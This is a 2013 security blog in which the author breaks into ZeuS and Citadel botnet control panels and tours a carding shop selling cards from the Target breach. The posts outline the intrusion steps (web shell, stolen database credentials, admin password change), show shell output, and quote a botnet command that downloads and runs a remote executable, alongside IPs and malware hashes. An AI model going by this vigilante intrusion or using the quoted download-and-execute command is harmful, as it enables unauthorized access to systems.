Monday, December 30, 2013

ZeuS C&C - bestbuyautotransport.com.au

More work done on command & control servers listed on ZeuS Tracker

bestbuyautotransport.com.au
203.170.86.145
netname:        austdomains
descr:          Internet Services Network
descr:          Global Telecommunications
country:        AU
abuse@syra.net.au

ZeuS Tracker details:

Config:



Login:


I cant get on this way, so I try something else. 



1. Drop a shell on your sandy seashore.

2. Grab mysql auth from config files. 

3. Look around (so small, sorry buddy)


4. Change admin password. (and get proper username) 




Lets try again.
Ok. Now we're in.

Confirmed. You have a small useless botnet (and penis).


Some OS statistics for Science:

Useless bots:


Some reports:
 No banking.






so silly. 

Sunday, December 29, 2013

Citadel C&C hosted on 173.242.112.135

Doing more work on the botnet command & control servers listed on ZeuS Tracker.

Citadel C&C
173.242.112.135 - VolumeDrive US
Citadel bot v.1.3.5.1
90% of bots located in India.
Evidence of stolen banking credentials.

This server panel is offline now, and its been removed from ZeuS Tracker now, so its ok to publish details about it.


Original ZeuS Tracker page:



Admin panel login:
http://173.242.112.135/office/obi/server/cp.php?m=login



and kick the door down..


Summary:


205 bots
(143 India)


first page of bot details: 
(is that your IP?)


Evidence of stealing credentials.
Facebook.com
ebs.ca-egypt.com (Crédit Agricole Egypt - Online Banking ePayroll System)





Here are some OS statistics to show what systems get infected.
XP, Win7, Win7 x64 and Server 2008 x64

Fun fact:
AntiVirus software is commonly seen running in memory alongside the bot exe.   :-)



Some options:
encryption key: obi





The guy was in the process of updating when I broke in. Oops, sorry about that.



user_execute hxxp://142.0.36.226/office/nh.exe 

(volumedrive again, US PA - get your shit together)

more details on this host later..142.0.36.226

nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437
Virus Total detection 5 of 48

malware phones home to:
185.24.233.5 (Ireland)
but the server has already been seen..https://zeustracker.abuse.ch/monitor.php?host=185.24.233.5

Interesting ports on 185.24.233.5:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1720/tcp filtered H.323/Q.931
3389/tcp open ms-term-serv

Win2k8 R2 Std
Home base for this h4x0r fucker..more on this detail later.


Saturday, December 28, 2013

ZeuS botnet - powdereddoughnut.com

More work on the ZeuS Tracker C&Cs 

powdereddoughnut.com - hosting small ZeuS botnet
199.204.248.103  - JumpLine, US, Ohio
Domain has Whois protection

Targets include VN and AE .gov sites
POP3 and HTTP credentials, no banking credentials seen



Config f8e2d5d42364f80332c7661dd5fbe4a3



ZeuS C&C login:



breaking...



Summary:
42 bots - why you so shitty and small?


OS Statistics to show what systems get hit.
note: Win7 x64


Someone left a sandy sea shell on your sea shore...


Shared hosting - wtf, really? 



$ uname -a
Linux cpanel03.myhostcenter.com 2.6.32-358.6.2.el6.x86_64 #1 SMP Thu May 16 20:59:36 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=33351(powdered) gid=33355(powdered) groups=33355(powdered)




bot_uninstall



Reported abuse to:
postmaster( a t )myhostcenter.com
compliance( a t ) opensrs.org

Chinese Food - TrojDropper:Win32/Swisyn (etc)

TrojDropper:Win32/Swisyn (etc)
hosted on:
61.147.112.88 (China Telcom, Beijing)



This HTTPFileServer seems to be a popular choice for the Chinese to host malware on Windows servers.

I was downloading samples and the server went down for a bit.

While I waited I sent them through malwr.com to get a quick analysis.

232.exe
(21.exe)
4a92ffcb4f35ab8e7daf4215e09b58f1

330.exe
4e8a0bed5ee626f202fcdcfa28b3176c

0308.exe
88ccbe2772f4a07f0a7f5925b1a366ac

3.exe
d9443a02281d495ab3ac1eea6a97d0d5

338.exe
776166289f8bce8312b85ffd0a375c01

55555
49d206f98b44ef9c58b711cd29b6c073
ELF executable

8G.NETBOT.CC.zip
9b71e5d676d005160f9096a618d33862

3306nodeJR
938a3ceb3691ca92734dcce7547ef394


C&C
8g.netbot.cc 100.42.235.28
kk.netbot.cc 190.115.20.14
33.netbot.cc 190.115.20.14

190.115.20.18
190.115.20.14

i-buy.gr hosting ZeuS botnet (now offline)

Working on the ZeuS Tracker C&Cs today.

New server added yesterday 27 Dec hosted on http://www.i-buy.gr 





Control Panel login:



and now for a little B&E action..

boom





Summary:
very small botnet


 Some stats about what OS are getting hit:

Another shell.




Contacted them...and ISP




Control panel now offline.

:-)

Personally, "I-will not-buy.gr" anything from these guys.
This box was ransacked..there were no auth logs, multiple shells, etc.
They obviously need to get their shit together.


Friday, December 20, 2013

Rscator.la - carding shop selling stolen cards from Target breach

In December 2013, millions of consumers' credit card information was stolen by hackers from the retail giant Target.

Brian Krebs wrote an excellent article explaining how these stolen cards are 'flooding underground markets'
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/

This post is a look inside the carding shop that is selling stolen credit card information from the Target data breach.

It is a usual shit carding shop, buy CCs and dumps, bin lookup, checker, etc.

One interesting thing about this shop: it features an automated WU and MG account crediting system. If you want to fund your account and make a purchase from this shop, you must reserve a 'drop' person to wire money to in Lviv, Ukraine. Nice.

Here we go...

Lovely login screen for a crook shop :-)
3 admins


Support:
JID: trayan@lampeduza.org   
ICQ: 100845
JID 2: flavius@lampeduza.org
ICQ 2: 17700
JID 3: rescator@lampeduza.org 
ICQ 3: 10576

Senator Rescator is some asshole hacker on the underground forum Lampeduza..thus Rescator.La is his. You can see he is listed as the 3rd admin.

After login page, News

Adverts for Kaddafi.hk on site - a related carder shop


News page, recent activity, active shop. 



Dumps

Note: over 199k out of 200k dumps are from America.


CC and Dumps pages:


Bin Lookup

Checker 




Ticketing system for support



Add money:



This is the interesting part - in order to fund your account on this shop, reserve a 'drop' and wire them the cash..

Lol at this:
P.S. Please send your transfers in non-exact amounts by adding 1-2-3-4-5-6-7 dollars. Meaning, when you want to transfer 500 dollars, please send - 508, 506, 503, 504, 505. That will help receiving funds much, much faster. 

Add money, reserve drop:





And Lol at this:
Send all your transfers to:
City: Lviv
Country: Ukraine